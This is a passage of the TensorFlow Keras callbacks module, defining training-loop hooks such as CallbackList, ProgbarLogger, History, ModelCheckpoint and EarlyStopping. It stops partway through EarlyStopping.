# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=g-import-not-at-top """Callbacks: utilities called at certain points during model training. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import csv import io import json import os import re import tempfile import time import numpy as np import six from tensorflow.python.data.ops import iterator_ops from tensorflow.python.distribute import distribute_coordinator_context as dc_context from tensorflow.python.eager import context from tensorflow.python.framework import ops from tensorflow.python.keras import backend as K from tensorflow.python.keras.utils.data_utils import Sequence from tensorflow.python.keras.utils.generic_utils import Progbar from tensorflow.python.keras.utils.mode_keys import ModeKeys from tensorflow.python.ops import array_ops from tensorflow.python.ops import summary_ops_v2 from tensorflow.python.platform import tf_logging as logging from tensorflow.python.training import checkpoint_management from tensorflow.python.util.tf_export import keras_export try: import requests except ImportError: requests = None # Constant for `tf.keras.Model` to store the epoch at which the most recently # saved checkpoint was saved. See `Model._get_updated_initial_epoch()`'s # docstring for more information. CKPT_SAVED_EPOCH = '_ckpt_saved_epoch' def configure_callbacks(callbacks, model, do_validation=False, batch_size=None, epochs=None, steps_per_epoch=None, samples=None, verbose=1, count_mode='steps', mode=ModeKeys.TRAIN): """Configures callbacks for use in various training loops. Arguments: callbacks: List of Callbacks. model: Model being trained. do_validation: Whether or not validation loop will be run. batch_size: Number of samples per batch. epochs: Number of epoch to train. steps_per_epoch: Number of batches to run per training epoch. samples: Number of training samples. verbose: int, 0 or 1. Keras logging verbosity to pass to ProgbarLogger. count_mode: One of 'steps' or 'samples'. Per-batch or per-sample count. mode: String. One of ModeKeys.TRAIN, ModeKeys.TEST, or ModeKeys.PREDICT. Which loop mode to configure callbacks for. Returns: Instance of CallbackList used to control all Callbacks. """ # Check if callbacks have already been configured. if isinstance(callbacks, CallbackList): return callbacks if not callbacks: callbacks = [] # Add additional callbacks during training. if mode == ModeKeys.TRAIN: model.history = History() callbacks = [BaseLogger()] + (callbacks or []) + [model.history] if verbose: callbacks.append(ProgbarLogger(count_mode)) callback_list = CallbackList(callbacks) # Set callback model callback_model = model._get_callback_model() # pylint: disable=protected-access callback_list.set_model(callback_model) set_callback_parameters( callback_list, model, do_validation=do_validation, batch_size=batch_size, epochs=epochs, steps_per_epoch=steps_per_epoch, samples=samples, verbose=verbose, mode=mode) callback_list.model.stop_training = False # pylint: disable=protected-access if callback_list.model._ckpt_saved_epoch is not None: # The attribute `_ckpt_saved_epoch` is supposed to be None at the start of # training (it should be made None at the end of successful multi-worker # training), unless the user's `fit()` does not end successfully before # making another `fit()` call. raise ValueError( '`tf.Keras.Model._ckpt_saved_epoch` attr should be None at ' 'callback setup time. Please ensure `fit()` in multi-worker ' 'training finishes successfully before starting a new one. If the ' 'issue persists, try using only one `model.fit()` in multi-worker ' 'training.') return callback_list def set_callback_parameters(callback_list, model, do_validation=False, batch_size=None, epochs=None, steps_per_epoch=None, samples=None, verbose=1, mode=ModeKeys.TRAIN): """Sets callback parameters. Arguments: callback_list: CallbackList instance. model: Model being trained. do_validation: Whether or not validation loop will be run. batch_size: Number of samples per batch. epochs: Number of epoch to train. steps_per_epoch: Number of batches to run per training epoch. samples: Number of training samples. verbose: int, 0 or 1. Keras logging verbosity to pass to ProgbarLogger. mode: String. One of ModeKeys.TRAIN, ModeKeys.TEST, or ModeKeys.PREDICT. Which loop mode to configure callbacks for. """ for cbk in callback_list: if isinstance(cbk, (BaseLogger, ProgbarLogger)): cbk.stateful_metrics = model.metrics_names[1:] # Exclude `loss` # Set callback parameters callback_metrics = [] # When we have deferred build scenario with iterator input, we will compile # when we standardize first batch of data. if mode != ModeKeys.PREDICT and hasattr(model, 'metrics_names'): callback_metrics = copy.copy(model.metrics_names) if do_validation: callback_metrics += ['val_' + n for n in model.metrics_names] callback_params = { 'batch_size': batch_size, 'epochs': epochs, 'steps': steps_per_epoch, 'samples': samples, 'verbose': verbose, 'do_validation': do_validation, 'metrics': callback_metrics, } callback_list.set_params(callback_params) def _is_generator_like(data): """Checks if data is a generator, Sequence, or Iterator.""" return (hasattr(data, 'next') or hasattr(data, '__next__') or isinstance( data, (Sequence, iterator_ops.Iterator, iterator_ops.IteratorV2))) def make_logs(model, logs, outputs, mode, prefix=''): """Computes logs for sending to `on_batch_end` methods.""" if mode in {ModeKeys.TRAIN, ModeKeys.TEST}: if hasattr(model, 'metrics_names'): for label, output in zip(model.metrics_names, outputs): logs[prefix + label] = output else: logs['outputs'] = outputs return logs class CallbackList(object): """Container abstracting a list of callbacks. Arguments: callbacks: List of `Callback` instances. queue_length: Queue length for keeping running statistics over callback execution time. """ def __init__(self, callbacks=None, queue_length=10): callbacks = callbacks or [] self.callbacks = [c for c in callbacks] self.queue_length = queue_length self.params = {} self.model = None self._reset_batch_timing() def _reset_batch_timing(self): self._delta_t_batch = 0. self._delta_ts = collections.defaultdict( lambda: collections.deque([], maxlen=self.queue_length)) def append(self, callback): self.callbacks.append(callback) def set_params(self, params): self.params = params for callback in self.callbacks: callback.set_params(params) def set_model(self, model): self.model = model for callback in self.callbacks: callback.set_model(model) def _call_batch_hook(self, mode, hook, batch, logs=None): """Helper function for all batch_{begin | end} methods.""" if not self.callbacks: return hook_name = 'on_{mode}_batch_{hook}'.format(mode=mode, hook=hook) if hook == 'begin': self._t_enter_batch = time.time() if hook == 'end': # Batch is ending, calculate batch time. self._delta_t_batch = time.time() - self._t_enter_batch logs = logs or {} t_before_callbacks = time.time() for callback in self.callbacks: batch_hook = getattr(callback, hook_name) batch_hook(batch, logs) self._delta_ts[hook_name].append(time.time() - t_before_callbacks) delta_t_median = np.median(self._delta_ts[hook_name]) if (self._delta_t_batch > 0. and delta_t_median > 0.95 * self._delta_t_batch and delta_t_median > 0.1): logging.warning( 'Method (%s) is slow compared ' 'to the batch update (%f). Check your callbacks.', hook_name, delta_t_median) def _call_begin_hook(self, mode): """Helper function for on_{train|test|predict}_begin methods.""" if mode == ModeKeys.TRAIN: self.on_train_begin() elif mode == ModeKeys.TEST: self.on_test_begin() else: self.on_predict_begin() def _call_end_hook(self, mode): """Helper function for on_{train|test|predict}_end methods.""" if mode == ModeKeys.TRAIN: self.on_train_end() elif mode == ModeKeys.TEST: self.on_test_end() else: self.on_predict_end() def on_batch_begin(self, batch, logs=None): self._call_batch_hook(ModeKeys.TRAIN, 'begin', batch, logs=logs) def on_batch_end(self, batch, logs=None): self._call_batch_hook(ModeKeys.TRAIN, 'end', batch, logs=logs) def on_epoch_begin(self, epoch, logs=None): """Calls the `on_epoch_begin` methods of its callbacks. This function should only be called during TRAIN mode. Arguments: epoch: integer, index of epoch. logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ logs = logs or {} for callback in self.callbacks: callback.on_epoch_begin(epoch, logs) self._reset_batch_timing() def on_epoch_end(self, epoch, logs=None): """Calls the `on_epoch_end` methods of its callbacks. This function should only be called during TRAIN mode. Arguments: epoch: integer, index of epoch. logs: dict, metric results for this training epoch, and for the validation epoch if validation is performed. Validation result keys are prefixed with `val_`. """ logs = logs or {} for callback in self.callbacks: callback.on_epoch_end(epoch, logs) def on_train_batch_begin(self, batch, logs=None): """Calls the `on_train_batch_begin` methods of its callbacks. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Has keys `batch` and `size` representing the current batch number and the size of the batch. """ self._call_batch_hook(ModeKeys.TRAIN, 'begin', batch, logs=logs) def on_train_batch_end(self, batch, logs=None): """Calls the `on_train_batch_end` methods of its callbacks. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Metric results for this batch. """ self._call_batch_hook(ModeKeys.TRAIN, 'end', batch, logs=logs) def on_test_batch_begin(self, batch, logs=None): """Calls the `on_test_batch_begin` methods of its callbacks. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Has keys `batch` and `size` representing the current batch number and the size of the batch. """ self._call_batch_hook(ModeKeys.TEST, 'begin', batch, logs=logs) def on_test_batch_end(self, batch, logs=None): """Calls the `on_test_batch_end` methods of its callbacks. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Metric results for this batch. """ self._call_batch_hook(ModeKeys.TEST, 'end', batch, logs=logs) def on_predict_batch_begin(self, batch, logs=None): """Calls the `on_predict_batch_begin` methods of its callbacks. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Has keys `batch` and `size` representing the current batch number and the size of the batch. """ self._call_batch_hook(ModeKeys.PREDICT, 'begin', batch, logs=logs) def on_predict_batch_end(self, batch, logs=None): """Calls the `on_predict_batch_end` methods of its callbacks. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Metric results for this batch. """ self._call_batch_hook(ModeKeys.PREDICT, 'end', batch, logs=logs) def on_train_begin(self, logs=None): """Calls the `on_train_begin` methods of its callbacks. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ for callback in self.callbacks: callback.on_train_begin(logs) def on_train_end(self, logs=None): """Calls the `on_train_end` methods of its callbacks. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ for callback in self.callbacks: callback.on_train_end(logs) def on_test_begin(self, logs=None): """Calls the `on_test_begin` methods of its callbacks. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ for callback in self.callbacks: callback.on_test_begin(logs) def on_test_end(self, logs=None): """Calls the `on_test_end` methods of its callbacks. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ for callback in self.callbacks: callback.on_test_end(logs) def on_predict_begin(self, logs=None): """Calls the 'on_predict_begin` methods of its callbacks. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ for callback in self.callbacks: callback.on_predict_begin(logs) def on_predict_end(self, logs=None): """Calls the `on_predict_end` methods of its callbacks. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ for callback in self.callbacks: callback.on_predict_end(logs) def __iter__(self): return iter(self.callbacks) @keras_export('keras.callbacks.Callback') class Callback(object): """Abstract base class used to build new callbacks. Attributes: params: dict. Training parameters (eg. verbosity, batch size, number of epochs...). model: instance of `keras.models.Model`. Reference of the model being trained. validation_data: Deprecated. Do not use. The `logs` dictionary that callback methods take as argument will contain keys for quantities relevant to the current batch or epoch. Currently, the `.fit()` method of the `Model` class will include the following quantities in the `logs` that it passes to its callbacks: on_epoch_end: logs include `acc` and `loss`, and optionally include `val_loss` (if validation is enabled in `fit`), and `val_acc` (if validation and accuracy monitoring are enabled). on_batch_begin: logs include `size`, the number of samples in the current batch. on_batch_end: logs include `loss`, and optionally `acc` (if accuracy monitoring is enabled). """ def __init__(self): self.validation_data = None self.model = None # Whether this Callback should only run on the chief worker in a # Multi-Worker setting. # TODO(omalleyt): Make this attr public once solution is stable. self._chief_worker_only = None def set_params(self, params): self.params = params def set_model(self, model): self.model = model def on_batch_begin(self, batch, logs=None): """A backwards compatibility alias for `on_train_batch_begin`.""" def on_batch_end(self, batch, logs=None): """A backwards compatibility alias for `on_train_batch_end`.""" def on_epoch_begin(self, epoch, logs=None): """Called at the start of an epoch. Subclasses should override for any actions to run. This function should only be called during TRAIN mode. Arguments: epoch: integer, index of epoch. logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ def on_epoch_end(self, epoch, logs=None): """Called at the end of an epoch. Subclasses should override for any actions to run. This function should only be called during TRAIN mode. Arguments: epoch: integer, index of epoch. logs: dict, metric results for this training epoch, and for the validation epoch if validation is performed. Validation result keys are prefixed with `val_`. """ def on_train_batch_begin(self, batch, logs=None): """Called at the beginning of a training batch in `fit` methods. Subclasses should override for any actions to run. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Has keys `batch` and `size` representing the current batch number and the size of the batch. """ # For backwards compatibility. self.on_batch_begin(batch, logs=logs) def on_train_batch_end(self, batch, logs=None): """Called at the end of a training batch in `fit` methods. Subclasses should override for any actions to run. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Metric results for this batch. """ # For backwards compatibility. self.on_batch_end(batch, logs=logs) def on_test_batch_begin(self, batch, logs=None): """Called at the beginning of a batch in `evaluate` methods. Also called at the beginning of a validation batch in the `fit` methods, if validation data is provided. Subclasses should override for any actions to run. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Has keys `batch` and `size` representing the current batch number and the size of the batch. """ def on_test_batch_end(self, batch, logs=None): """Called at the end of a batch in `evaluate` methods. Also called at the end of a validation batch in the `fit` methods, if validation data is provided. Subclasses should override for any actions to run. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Metric results for this batch. """ def on_predict_batch_begin(self, batch, logs=None): """Called at the beginning of a batch in `predict` methods. Subclasses should override for any actions to run. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Has keys `batch` and `size` representing the current batch number and the size of the batch. """ def on_predict_batch_end(self, batch, logs=None): """Called at the end of a batch in `predict` methods. Subclasses should override for any actions to run. Arguments: batch: integer, index of batch within the current epoch. logs: dict. Metric results for this batch. """ def on_train_begin(self, logs=None): """Called at the beginning of training. Subclasses should override for any actions to run. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ def on_train_end(self, logs=None): """Called at the end of training. Subclasses should override for any actions to run. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ def on_test_begin(self, logs=None): """Called at the beginning of evaluation or validation. Subclasses should override for any actions to run. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ def on_test_end(self, logs=None): """Called at the end of evaluation or validation. Subclasses should override for any actions to run. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ def on_predict_begin(self, logs=None): """Called at the beginning of prediction. Subclasses should override for any actions to run. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ def on_predict_end(self, logs=None): """Called at the end of prediction. Subclasses should override for any actions to run. Arguments: logs: dict. Currently no data is passed to this argument for this method but that may change in the future. """ @keras_export('keras.callbacks.BaseLogger') class BaseLogger(Callback): """Callback that accumulates epoch averages of metrics. This callback is automatically applied to every Keras model. Arguments: stateful_metrics: Iterable of string names of metrics that should *not* be averaged over an epoch. Metrics in this list will be logged as-is in `on_epoch_end`. All others will be averaged in `on_epoch_end`. """ def __init__(self, stateful_metrics=None): super(BaseLogger, self).__init__() self.stateful_metrics = set(stateful_metrics or []) def on_epoch_begin(self, epoch, logs=None): self.seen = 0 self.totals = {} def on_batch_end(self, batch, logs=None): logs = logs or {} batch_size = logs.get('size', 0) # In case of distribution strategy we can potentially run multiple steps # at the same time, we should account for that in the `seen` calculation. num_steps = logs.get('num_steps', 1) self.seen += batch_size * num_steps for k, v in logs.items(): if k in self.stateful_metrics: self.totals[k] = v else: if k in self.totals: self.totals[k] += v * batch_size else: self.totals[k] = v * batch_size def on_epoch_end(self, epoch, logs=None): if logs is not None: for k in self.params['metrics']: if k in self.totals: # Make value available to next callbacks. if k in self.stateful_metrics: logs[k] = self.totals[k] else: logs[k] = self.totals[k] / self.seen @keras_export('keras.callbacks.TerminateOnNaN') class TerminateOnNaN(Callback): """Callback that terminates training when a NaN loss is encountered. """ def on_batch_end(self, batch, logs=None): logs = logs or {} loss = logs.get('loss') if loss is not None: if np.isnan(loss) or np.isinf(loss): print('Batch %d: Invalid loss, terminating training' % (batch)) self.model.stop_training = True @keras_export('keras.callbacks.ProgbarLogger') class ProgbarLogger(Callback): """Callback that prints metrics to stdout. Arguments: count_mode: One of "steps" or "samples". Whether the progress bar should count samples seen or steps (batches) seen. stateful_metrics: Iterable of string names of metrics that should *not* be averaged over an epoch. Metrics in this list will be logged as-is. All others will be averaged over time (e.g. loss, etc). Raises: ValueError: In case of invalid `count_mode`. """ def __init__(self, count_mode='samples', stateful_metrics=None): super(ProgbarLogger, self).__init__() if count_mode == 'samples': self.use_steps = False elif count_mode == 'steps': self.use_steps = True else: raise ValueError('Unknown `count_mode`: ' + str(count_mode)) self.stateful_metrics = set(stateful_metrics or []) def on_train_begin(self, logs=None): self.verbose = self.params['verbose'] self.epochs = self.params['epochs'] def on_epoch_begin(self, epoch, logs=None): self.seen = 0 if self.use_steps: self.target = self.params['steps'] else: self.target = self.params['samples'] if self.verbose: if self.epochs > 1: print('Epoch %d/%d' % (epoch + 1, self.epochs)) self.progbar = Progbar( target=self.target, verbose=self.verbose, stateful_metrics=self.stateful_metrics, unit_name='step' if self.use_steps else 'sample') def on_batch_begin(self, batch, logs=None): self.log_values = [] def on_batch_end(self, batch, logs=None): logs = logs or {} batch_size = logs.get('size', 0) # In case of distribution strategy we can potentially run multiple steps # at the same time, we should account for that in the `seen` calculation. num_steps = logs.get('num_steps', 1) if self.use_steps: self.seen += num_steps else: self.seen += batch_size * num_steps for k in self.params['metrics']: if k in logs: self.log_values.append((k, logs[k])) # Skip progbar update for the last batch; # will be handled by on_epoch_end. if self.verbose and (self.target is None or self.seen < self.target): self.progbar.update(self.seen, self.log_values) def on_epoch_end(self, epoch, logs=None): logs = logs or {} for k in self.params['metrics']: if k in logs: self.log_values.append((k, logs[k])) if self.verbose: self.progbar.update(self.seen, self.log_values) @keras_export('keras.callbacks.History') class History(Callback): """Callback that records events into a `History` object. This callback is automatically applied to every Keras model. The `History` object gets returned by the `fit` method of models. """ def on_train_begin(self, logs=None): self.epoch = [] self.history = {} def on_epoch_end(self, epoch, logs=None): logs = logs or {} self.epoch.append(epoch) for k, v in logs.items(): self.history.setdefault(k, []).append(v) @keras_export('keras.callbacks.ModelCheckpoint') class ModelCheckpoint(Callback): """Save the model after every epoch. `filepath` can contain named formatting options, which will be filled the value of `epoch` and keys in `logs` (passed in `on_epoch_end`). For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`, then the model checkpoints will be saved with the epoch number and the validation loss in the filename. Arguments: filepath: string, path to save the model file. monitor: quantity to monitor. verbose: verbosity mode, 0 or 1. save_best_only: if `save_best_only=True`, the latest best model according to the quantity monitored will not be overwritten. mode: one of {auto, min, max}. If `save_best_only=True`, the decision to overwrite the current save file is made based on either the maximization or the minimization of the monitored quantity. For `val_acc`, this should be `max`, for `val_loss` this should be `min`, etc. In `auto` mode, the direction is automatically inferred from the name of the monitored quantity. save_weights_only: if True, then only the model's weights will be saved (`model.save_weights(filepath)`), else the full model is saved (`model.save(filepath)`). save_freq: `'epoch'` or integer. When using `'epoch'`, the callback saves the model after each epoch. When using integer, the callback saves the model at end of a batch at which this many samples have been seen since last saving. Note that if the saving isn't aligned to epochs, the monitored metric may potentially be less reliable (it could reflect as little as 1 batch, since the metrics get reset every epoch). Defaults to `'epoch'` load_weights_on_restart: Whether the training should restore the model. If True, the model will attempt to load the checkpoint file from `filepath` at the start of `model.fit()`. This saves the need of manually calling `model.load_weights()` before `model.fit(). In multi-worker distributed training, this provides fault-tolerance and loads the model automatically upon recovery of workers. The callback gives up loading if the filepath does not exist, and raises ValueError if format does not match. Defaults to False. **kwargs: Additional arguments for backwards compatibility. Possible key is `period`. """ def __init__(self, filepath, monitor='val_loss', verbose=0, save_best_only=False, save_weights_only=False, mode='auto', save_freq='epoch', load_weights_on_restart=False, **kwargs): super(ModelCheckpoint, self).__init__() self.monitor = monitor self.verbose = verbose self.filepath = filepath self.save_best_only = save_best_only self.save_weights_only = save_weights_only self.save_freq = save_freq self.load_weights_on_restart = load_weights_on_restart self.epochs_since_last_save = 0 self._samples_seen_since_last_saving = 0 # Deprecated field `period` is for the number of epochs between which # the model is saved. if 'period' in kwargs: self.period = kwargs['period'] logging.warning('`period` argument is deprecated. Please use `save_freq` ' 'to specify the frequency in number of samples seen.') else: self.period = 1 if mode not in ['auto', 'min', 'max']: logging.warning('ModelCheckpoint mode %s is unknown, ' 'fallback to auto mode.', mode) mode = 'auto' if mode == 'min': self.monitor_op = np.less self.best = np.Inf elif mode == 'max': self.monitor_op = np.greater self.best = -np.Inf else: if 'acc' in self.monitor or self.monitor.startswith('fmeasure'): self.monitor_op = np.greater self.best = -np.Inf else: self.monitor_op = np.less self.best = np.Inf if self.save_freq != 'epoch' and not isinstance(self.save_freq, int): raise ValueError('Unrecognized save_freq: {}'.format(self.save_freq)) # Only the chief worker writes model checkpoints, but all workers # restore checkpoint at on_train_begin(). self._chief_worker_only = False def set_model(self, model): self.model = model # Use name matching rather than `isinstance` to avoid circular dependencies. if (not self.save_weights_only and not model._is_graph_network and # pylint: disable=protected-access model.__class__.__name__ != 'Sequential'): self.save_weights_only = True def on_train_begin(self, logs=None): # TODO(rchao): Replace dc_context reference with # distributed_training_utils.should_current_worker_load_model() once # distributed_training_utils.py no longer depends on callbacks.py. if K.in_multi_worker_mode( ) and not dc_context.get_current_worker_context().experimental_should_init: # For multi-worker training, it should not restore a model in certain # worker setting (e.g. non-chief worker in ParameterServerStrategy). return filepath_to_load = self._get_most_recently_modified_file_matching_pattern( self.filepath) if (self.load_weights_on_restart and filepath_to_load is not None and os.path.exists(filepath_to_load)): try: # `filepath` may contain placeholders such as `{epoch:02d}`, and thus # it attempts to load the most recently modified file with file name # matching the pattern. self.model.load_weights(filepath_to_load) except (IOError, ValueError) as e: raise ValueError('Error loading file from {}. Reason: {}'.format( filepath_to_load, e)) def on_train_end(self, logs=None): logs = logs or {} # pylint: disable=protected-access if self.model._ckpt_saved_epoch is not None: # Make `_ckpt_saved_epoch` attribute `None` at the end of training as it # is only used during the training. Currently it is decided not to # support fault tolerance across multiple `model.fit()` or `model.fit()` # with other `model` methods. epoch = self.model._ckpt_saved_epoch self.model._ckpt_saved_epoch = None # TODO(rchao): Support all `save_weights_only` and `save_best_only` cases. # This will be done with the help of a decoupled training state file that # contains both epoch and model weights. if self.save_weights_only and not self.save_best_only: file_handle, filepath = self._get_file_handle_and_path(epoch, logs) self.model.save_weights(filepath, overwrite=True) self._maybe_remove_file(file_handle, filepath) def on_batch_end(self, batch, logs=None): logs = logs or {} if isinstance(self.save_freq, int): self._samples_seen_since_last_saving += logs.get('size', 1) if self._samples_seen_since_last_saving >= self.save_freq: self._save_model(epoch=self._current_epoch, logs=logs) self._samples_seen_since_last_saving = 0 def on_epoch_begin(self, epoch, logs=None): self._current_epoch = epoch def on_epoch_end(self, epoch, logs=None): self.epochs_since_last_save += 1 if self.save_freq == 'epoch': self._save_model(epoch=epoch, logs=logs) def _save_model(self, epoch, logs): """Saves the model. Arguments: epoch: the epoch this iteration is in. logs: the `logs` dict passed in to `on_batch_end` or `on_epoch_end`. """ logs = logs or {} if isinstance(self.save_freq, int) or self.epochs_since_last_save >= self.period: self.epochs_since_last_save = 0 file_handle, filepath = self._get_file_handle_and_path(epoch, logs) if self.save_best_only: current = logs.get(self.monitor) if current is None: logging.warning('Can save best model only with %s available, ' 'skipping.', self.monitor) else: if self.monitor_op(current, self.best): if self.verbose > 0: print('\nEpoch %05d: %s improved from %0.5f to %0.5f,' ' saving model to %s' % (epoch + 1, self.monitor, self.best, current, filepath)) self.best = current if self.save_weights_only: self.model.save_weights(filepath, overwrite=True) else: self.model.save(filepath, overwrite=True) else: if self.verbose > 0: print('\nEpoch %05d: %s did not improve from %0.5f' % (epoch + 1, self.monitor, self.best)) else: if self.verbose > 0: print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath)) if self.save_weights_only: if K.in_multi_worker_mode(): # TODO(rchao): Save to an additional training state file for FT, # instead of adding an attr to weight file. With this we can support # the cases of all combinations with `save_weights_only`, # `save_best_only`, and `save_format` parameters. # pylint: disable=protected-access self.model._ckpt_saved_epoch = epoch self.model.save_weights(filepath, overwrite=True) else: self.model.save(filepath, overwrite=True) self._maybe_remove_file(file_handle, filepath) def _get_file_handle_and_path(self, epoch, logs): """Returns the file handle and path.""" # TODO(rchao): Replace dc_context reference with # distributed_training_utils.should_current_worker_checkpoint() once # distributed_training_utils.py no longer depends on callbacks.py. if not K.in_multi_worker_mode() or dc_context.get_current_worker_context( ).should_checkpoint: return None, self.filepath.format(epoch=epoch + 1, **logs) else: # If this is multi-worker training, and this worker should not # save checkpoint, we replace the filepath with a dummy filepath so # it writes to a file that will be removed at the end of _save_model() # call. This is because the SyncOnReadVariable needs to be synced across # all the workers in order to be read, and all workers need to initiate # that. file_handle, temp_file_name = tempfile.mkstemp() extension = os.path.splitext(self.filepath)[1] return file_handle, temp_file_name + '.' + extension def _maybe_remove_file(self, file_handle, filepath): # Remove the file in multi-worker training where this worker should # not checkpoint. It is a dummy file previously saved for sync distributed # training. if K.in_multi_worker_mode( ) and not dc_context.get_current_worker_context().should_checkpoint: os.close(file_handle) os.remove(filepath) def _get_most_recently_modified_file_matching_pattern(self, pattern): """Returns the most recently modified filepath matching pattern. Pattern may contain python formatting placeholder. If `tf.train.latest_checkpoint()` does not return None, use that; otherwise, check for most recently modified one that matches the pattern. In the rare case where there are more than one pattern-matching file having the same modified time that is most recent among all, return the filepath that is largest (by `>` operator, lexicographically using the numeric equivalents). This provides a tie-breaker when multiple files are most recent. Note that a larger `filepath` can sometimes indicate a later time of modification (for instance, when epoch/batch is used as formatting option), but not necessarily (when accuracy or loss is used). The tie-breaker is put in the logic as best effort to return the most recent, and to avoid undeterministic result. Modified time of a file is obtained with `os.path.getmtime()`. This utility function is best demonstrated via an example: ```python file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5' test_dir = self.get_temp_dir() path_pattern = os.path.join(test_dir, file_pattern) file_paths = [ os.path.join(test_dir, file_name) for file_name in ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5'] ] for file_path in file_paths: # Write something to each of the files self.assertEqual( _get_most_recently_modified_file_matching_pattern(path_pattern), file_paths[-1]) ``` Arguments: pattern: The file pattern that may optionally contain python placeholder such as `{epoch:02d}`. Returns: The most recently modified file's full filepath matching `pattern`. If `pattern` does not contain any placeholder, this returns the filepath that exactly matches `pattern`. Returns `None` if no match is found. """ dir_name = os.path.dirname(pattern) base_name = os.path.basename(pattern) base_name_regex = '^' + re.sub(r'{.*}', r'.*', base_name) + '$' # If tf.train.latest_checkpoint tells us there exists a latest checkpoint, # use that as it is more robust than `os.path.getmtime()`. latest_tf_checkpoint = checkpoint_management.latest_checkpoint(dir_name) if latest_tf_checkpoint is not None and re.match( base_name_regex, os.path.basename(latest_tf_checkpoint)): return latest_tf_checkpoint latest_mod_time = 0 file_path_with_latest_mod_time = None n_file_with_latest_mod_time = 0 file_path_with_largest_file_name = None if os.path.exists(dir_name): for file_name in os.listdir(dir_name): # Only consider if `file_name` matches the pattern. if re.match(base_name_regex, file_name): file_path = os.path.join(dir_name, file_name) mod_time = os.path.getmtime(file_path) if (file_path_with_largest_file_name is None or file_path > file_path_with_largest_file_name): file_path_with_largest_file_name = file_path if mod_time > latest_mod_time: latest_mod_time = mod_time file_path_with_latest_mod_time = file_path # In the case a file with later modified time is found, reset # the counter for the number of files with latest modified time. n_file_with_latest_mod_time = 1 elif mod_time == latest_mod_time: # In the case a file has modified time tied with the most recent, # increment the counter for the number of files with latest modified # time by 1. n_file_with_latest_mod_time += 1 if n_file_with_latest_mod_time == 1: # Return the sole file that has most recent modified time. return file_path_with_latest_mod_time else: # If there are more than one file having latest modified time, return # the file path with the largest file name. return file_path_with_largest_file_name @keras_export('keras.callbacks.EarlyStopping') class EarlyStopping(Callback): """Stop training when a monitored quantity has stopped improving. Arguments: monitor: Quantity to be monitored. min_delta: Minimum change in the monitored quantity to qualify as an improvement, i.e. an absolute change of less than min_delta, will count as no improvement. patience: Number of epochs with no improvement after which training will be stopped. verbose: verbosity mode. mode: One of `{"auto", "min", "max"}`. In `min` mode, training will stop when the quantity monitored has stopped decreasing; in `max` mode it will stop when the quantity monitored has stopped increasing; in `auto` mode, the direction is automatically inferred from the name of the monitored quantity. baseline: Baseline value for the monitored quantity. Training will stop if the model doesn't show improvement over the baseline. restore_best_weights: Whether to restore model weights from the epoch with the best value of the monitored quantity. If False, the model weights obtained at the last step of training are used. Example: ```python callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=3) # This callback will stop the training when there is no improvement in # the validation loss for three consecutive epochs. model.fit(data, labels, epochs=100, callbacks=[callback], validation_data=(val_data, val_labels)) ``` """ def __init__(self, monitor='val_loss', min_delta=0, patience=0, verbose=0, mode='auto', baseline=None, restore_best_weights=False): super(EarlyStopping, self).__init__() self.monitor = monitor self.patience = patience self.verbose = verbose self.baseline = baseline self.min_delta = abs(min_delta) self.wait = 0 self.stopped_epoch = 0 self.restore_best_weights = restore_best_weights self.best_weights = None if mode not in ['auto', 'min', 'max']: logging.warning('EarlyStopping mode %s is unknown, ' 'fallback to auto mode.', mode) mode = 'auto' if mode == 'min': self.monitor_op = np.less elif mode == 'max': self.monitor_op = np.greater else: if 'acc' in self.monitor: self.monitor_op = np.greater else: self.monitor_op = np.less if self.monitor_op == np.greater: self.min_delta *= 1 else: self.min_delta *= -1 def on_train_begin(self, logs=None): # Allow instances to be re-used self.wait = 0 self.stopped_epoch = 0 if self.baseline is not None: self.best = self.baseline else: self.best = np.Inf if self.monitor_op == np.less else -np.Inf def on_epoch_end(self, epoch, logs=None): current = self.get_monitor_value(logs) if current is None: return if self.monitor_op(current - self.min_delta, self.best): self.best = current self.wait = 0 if self.restore_best_weights: self.best_weights = self.model.get_weights() else: self.wait += 1 if self.wait >= self.patience: self.stopped_epoch = epoch self.model.stop_training = True if self.restore_best_weights: if self.verbose > 0: print('Restoring model weights from the end of the best epoch.') self.model.set_weights(self.best_weights) def on_train_end(self, logs=None): if self.stopped_epoch > 0 and self.verbose > 0: print('Epoch %05d: early stopping' % (self.stopped_epoch + 1)) def get_monitor_value(self, logs): logs = logs or {} monitor_value = logs.get(self.monitor) if monitor_value is None: logging.warning('Early 